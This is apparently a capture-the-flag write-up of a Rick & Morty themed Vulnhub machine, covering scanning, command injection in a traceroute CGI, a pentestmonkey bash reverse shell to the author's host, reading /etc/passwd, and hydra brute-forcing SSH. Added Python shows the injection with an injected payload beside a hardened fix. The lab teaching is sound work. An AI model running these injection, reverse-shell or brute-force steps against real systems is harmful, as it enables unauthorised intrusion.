It’s been a while since I’ve done a full writeup, so I figured I was due to post another one. Mainly I’ve been working through as many HacktheBox Windows machines as possible in preparation for the OSCP exam (I think I’m finally getting somewhat decent at Windows priv-esc).
Vulnhub just posted a bunch of new VMs, though, and I couldn’t resist doing a Rick & Morty themed challenge. 🙂 There is a series of flags worth 130 points in total, so let’s see if we can get them all!
We’ll kick things off with an nmap host discovery (ping sweep) scan. Note that -sP is the legacy spelling of -sn in current nmap releases; both skip the port scan and only report which hosts are up.
nmap 192.168.111.0/24 -sP
Now for an OS detection (-O) and service version (-sV) scan of the host we found.
nmap 192.168.111.100 -O -sV
Looks like we have several services to work with, including Cockpit Web Service, which I’m not too familiar with personally. Some googling shows that it is a web-based server administration tool, and we can get to its login prompt on the port listed above: http://192.168.111.100:9090/
Without too much effort there is our first flag! 10/130 points acquired.
I’m a little confused about the prompt, though. There is no available field for a password, and whatever I fill in for the user name, I can’t hit enter to try to authenticate or do anything interactive. One thought is that it is trying to validate the user ID before prompting for a password, but it may just be that the site is broken, or that my browser is incompatible. We’ll come back to this and check out the other services instead.
Let’s take a look at the main HTTP site:
Not much here, and the HTML source is just as barren. We’ll do a quick nikto scan to see if there are any more obvious directory listings, admin pages, etc. to take a look at.
If this was a real environment that would look way too suspiciously like a honeypot.
The contents of FLAG.txt (20/130 points acquired):
And the contents of passwords.html:
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
So we have a password of “winter”, but which service and user ID is it for? Let’s take that hint and dig a little deeper using dirbuster to further enumerate possible paths on the web server. Using the “directory-list-2.3-small.txt” wordlist, I first tried searching for directories plus files with the extensions txt, html and php:
Taking a look at the robots.txt file we get yet another clue.
root_shell.cgi gives an “--UNDER CONSTRUCTION--” message with the following source:
<html><head><title>Root Shell </title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>
The tracertool.cgi seems to be up and running, though. We’ll give it a test.
Now let’s see if we can append additional commands to the host we hand it.
Yup, I absolutely can. I’ll try reusing a bash reverse shell one-liner from pentestmonkey again:
bash -i >& /dev/tcp/192.168.111.101/8080 0>&1
Before running it I’ll also open a netcat listener on my Kali machine:
nc -nlp 8080
No go. I tried some different spacing and formatting and different ports (80, 443, etc.), but no success. I added commands to the end to make sure there were no breaks in execution, and tried the Perl/Python shells with the same results. I’m guessing there are very strict limits on the commands available to apache, and/or firewall rules restricting traffic.
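To show why tracertool.cgi is injectable at all, and what the fix looks like, here is an added example written for this writeup (it is my own illustrative code, not the CGI on the box, whose source we never see). It assumes the vulnerable CGI does the classic thing of concatenating the submitted host into a shell string; the function names and the hardened variant are my own.

```python
"""Added example: command injection through string-built shell commands,
beside a hardened version.  Illustrative code for this writeup; the
assumption that tracertool.cgi concatenates the host into a shell string
is a hypothesis, not something read from the box."""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
# No room here for ; | & ` $ ( ) < > or whitespace.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(host: str) -> str:
    """What a naive CGI does: glue user input into one string that is
    later handed to /bin/sh -c.  Returned (not executed) so the test can
    show that an appended ';' command survives untouched."""
    return "traceroute " + host


def is_safe_target(host: str) -> bool:
    """Allow-list check: the target must be a literal IP address or a
    plain hostname.  Everything else, including every shell
    metacharacter, is rejected."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(host))


def hardened_argv(host: str) -> List[str]:
    """Validate first, then build an argv list.  With shell=False there is
    no shell to interpret metacharacters even if validation had a gap.
    -m 5 caps the hop count so the CGI cannot be used to tie up workers."""
    if not is_safe_target(host):
        raise ValueError("refusing traceroute target: %r" % host)
    return ["traceroute", "-m", "5", host]


def run_traceroute(host: str) -> subprocess.CompletedProcess:
    """The hardened call as the CGI would issue it."""
    return subprocess.run(
        hardened_argv(host), capture_output=True, text=True, timeout=60, check=False
    )


if __name__ == "__main__":
    evil = "127.0.0.1; cat /etc/passwd"
    print("vulnerable string:", vulnerable_command(evil))
    print("safe?", is_safe_target(evil), is_safe_target("127.0.0.1"))
    try:
        hardened_argv(evil)
    except ValueError as err:
        print("hardened:", err)
```

The important difference is the second one: validating input is good, but passing an argv list with shell=False means the injected text would only ever be seen by traceroute as a (bad) hostname, never by a shell.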
So what else can we do to try and exploit this available command injection?
Ha ha, someone replaced the cat command with one that prints an ASCII-art cat to the screen instead. What can we use in place of cat?
Well, “head” & “tail” work to grab the first/last 100 bytes:
Without any overlap between the two chunks we can’t be sure we aren’t missing some accounts, though. Let’s try “more” instead:
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
There we go. After stripping out the login IDs that don’t have an interactive shell, let’s try logging into SSH with the password “winter” we found above.
That doesn’t work, or at least we might have to do something to activate it first. Let’s try the credentials against FTP instead.
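The filtering step above is easy to do by eye for a handful of lines, but for a long /etc/passwd it is worth a small parser. This is an added example written for this writeup, not a script from the original post: the seven nologin lines are the ones shown above, and the two entries for Summer and RickSanchez are constructed (their uid, gid, gecos and home values are assumptions, not dumped from the box).

```python
"""Added example: parse /etc/passwd and keep only accounts that can get an
interactive shell.  Sample input is partly from the writeup (nologin
lines) and partly constructed (Summer and RickSanchez rows)."""
from dataclasses import dataclass
from typing import List

# Shells that end a login session immediately (or never start one).
NOLOGIN_SHELLS = {
    "/sbin/nologin", "/usr/sbin/nologin",
    "/bin/false", "/usr/bin/false",
    "/bin/sync", "/sbin/halt", "/sbin/shutdown",
}


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Split each non-empty, non-comment line into its seven colon fields.
    A line with the wrong field count is an error rather than silently
    skipped: on a CTF box that usually means a truncated dump."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def interactive_accounts(entries: List[PasswdEntry]) -> List[PasswdEntry]:
    """An empty shell field means login(1) falls back to /bin/sh, so it
    counts as interactive; only the explicit nologin-style shells drop out."""
    return [e for e in entries if e.shell not in NOLOGIN_SHELLS]


# Seven lines as shown on the box plus two constructed rows (assumed values).
SAMPLE_PASSWD = """\
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
Summer:x:1000:1000:constructed row:/home/Summer:/bin/bash
RickSanchez:x:1001:1001:constructed row:/home/RickSanchez:/bin/bash
"""


def candidate_usernames(text: str = SAMPLE_PASSWD) -> List[str]:
    """Names worth feeding to a password guess against SSH/FTP."""
    return [e.name for e in interactive_accounts(parse_passwd(text))]


if __name__ == "__main__":
    for name in candidate_usernames():
        print(name)
```

Feeding the result straight into a `-L` users file for hydra is the usual next step; the uid and home fields are kept on the dataclass because a non-system uid or a populated home directory is often a second hint about which accounts are real people.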
And there is another flag! (30/130 points)
Convinced I was possibly missing something, I re-ran a full port scan of the IP.
nmap 192.168.111.100 -O -sV -p- -T4
My intuition was correct, and we got yet another flag right in the service fingerprint for port 13337. (40/130 points)
Let’s try Summer/winter against the SSH service on the non-standard port 22222 now instead.
That worked! There’s a flag, but it’s the same one we found through FTP (which pointed directly to Summer’s home directory as well).
Listing out the contents of the available home directories gives us many possible leads. I pulled down all the files listed here and then tried to unzip journal.txt.zip, but it requires a password.
On the face of it Safe_Password.jpg only shows the following:
But a simple cat of the downloaded file on the Kali box (strings would be the cleaner tool for this) reveals the password embedded in it:
Using the password “Meeseek” the zip extracts successfully and we’re given another flag and a new hint. (60/130 points)
Binwalk identifies the “safe” file as an ELF executable. Let’s try running it.
A quick “apt-get install mcrypt” pulls in the missing shared library and we’re able to run the executable.
Using the “131333” from the flag above passed as an argument we’ve got our next flag! (80/130 points)
Checking the Rick & Morty fan wiki, I find that Rick’s old band name is “The Flesh Curtains”.
So that gives us 26 upper-case letters, then 10 possible digits, and then 6 band-name word possibilities (initially trying each of the three words with the first letter capitalized and all lower-case; we may need to add other combinations like all upper-case if that doesn’t work).
With some quick and dirty Python and a few nested loops I created a candidate password list of 26 × 10 × 6 = 1560 combinations. Now let’s feed the list to Hydra and try to authenticate to SSH on port 22222 with the RickSanchez ID we know from dumping /etc/passwd and the home directory listing above.
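A cleaned-up version of that generator, as an added example written for this writeup rather than the original script: one upper-case letter, one digit, then one of the three words of “The Flesh Curtains” in Capitalized or lower-case form, in that order. It also takes the all-upper-case fallback mentioned above as an option, which grows the list to 26 × 10 × 9 = 2340. The output file name is the one used in the hydra command that follows.

```python
"""Added example: build the <LETTER><digit><word> candidate list for
hydra.  Own code for this writeup; the band name comes from the text,
the all_upper option is the fallback the text mentions."""
import itertools
import string
from typing import Iterable, List

BAND_NAME = "The Flesh Curtains"


def word_variants(band_name: str, all_upper: bool = False) -> List[str]:
    """Capitalized and lower-case form of every word in the band name;
    all_upper=True adds the ALL-CAPS form as well.  Order is preserved
    and duplicates (e.g. a word that is already lower-case) are dropped."""
    variants: List[str] = []
    for word in band_name.split():
        forms = [word.capitalize(), word.lower()]
        if all_upper:
            forms.append(word.upper())
        for form in forms:
            if form not in variants:
                variants.append(form)
    return variants


def build_wordlist(words: Iterable[str]) -> List[str]:
    """Cartesian product letter x digit x word, in that order, so the
    first candidate is A0<first word> and the last is Z9<last word>."""
    return [
        "".join(parts)
        for parts in itertools.product(string.ascii_uppercase, string.digits, list(words))
    ]


def write_wordlist(path: str, candidates: Iterable[str]) -> int:
    """Write one candidate per line; returns the number written."""
    count = 0
    with open(path, "w", encoding="ascii") as fh:
        for candidate in candidates:
            fh.write(candidate + "\n")
            count += 1
    return count


if __name__ == "__main__":
    candidates = build_wordlist(word_variants(BAND_NAME))
    written = write_wordlist("rickmortypass.txt", candidates)
    print(f"wrote {written} candidates")  # 1560 with the default two cases
```

With 1560 guesses and hydra’s default of 16 parallel tasks this finishes in minutes even against SSH; if the hint had left the position of the digit open, the same product would be built with the three components in every permutation instead.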
hydra -l RickSanchez -P rickmortypass.txt ssh://192.168.111.100 -s 22222
It doesn’t take long at all to get a successful hit! Let’s go ahead and log in as Rick.
We have root! Looking in /root/ we find another flag. (110/130 points)
We’re still missing 20 points, though. We never took a look at what was on port 60000, so let’s do that now…
Doing a simple telnet connection to grab the banner, a shell opens immediately. (120/130 points)
After racking my brain for a while trying to figure out what else I might have missed, I ended up searching for additional “flag.txt” files as root and found the last one under /var/ftp (the public FTP directory). (130/130 points)
Testing now, I see you’re able to log into the FTP server with anonymous credentials:
Well, that’s it! Got all the flags as well as root!